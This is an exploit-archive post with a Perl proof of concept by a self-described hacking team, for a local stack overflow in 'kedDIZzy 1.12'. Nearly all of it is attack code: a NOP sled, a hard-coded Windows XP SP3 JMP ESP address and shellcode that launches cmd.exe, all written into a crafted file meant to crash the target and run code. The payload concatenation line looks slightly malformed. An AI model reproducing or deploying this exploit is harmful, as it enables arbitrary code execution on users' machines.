ExploitFixes
[D] PERL : kedDIZzy 1.12 Local Stack Overflow [z] 2011-01-14 15:50:17
Posted by: kedans

=-=-=-=-=-=-=-={In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] PERL : kedDIZzy 1.12 Local Stack Overflow [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com >

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::(0x1a):::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl

#########################################################
## Usage-->>file created-->>load file-->>keddz.exe>>>BOOM!
#########################################################

#This Gap exploited By KedAns-Dz ** Converted From Ruby

print "-----------------------------------------------------\n";
print "[!] kedDIZzy 1.12 Local Stack Overflow\n";
print "\n";
print "[!] Author: KedAns-Dz\n";
print "\n";
print "[!] Mail: ked-h(at)hotmail(dot)com\n";
print "-----------------------------------------------------\n";
my($ShellK,$nopk1,$nopk2,$jmpk,$PoC);
#Start Shell >>
$ShellK =
"\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC".
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45".
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45".
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45".
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";

# Preparing the exploit...
$nopk1 = "\x90" x 284;
$nopk2 = "\x90" x 17;
$jmpk = "\x73\x18\x6E\x74" ; # win32/xp sp3 MSCTF.dll: JMP ESP
$PoC =" .$nopk1. .$jmpk. .$nopk2. .$ShellK.";

# B0oM!

open("file" , ">", "keddz.exe");

print file $PoC;

close("file");

print "\nFile ' keddz.exe ' successfully created!\n";

# By KedAns-Dz

:::::::::::::::::::::::::::::(0x2a):::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z]

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --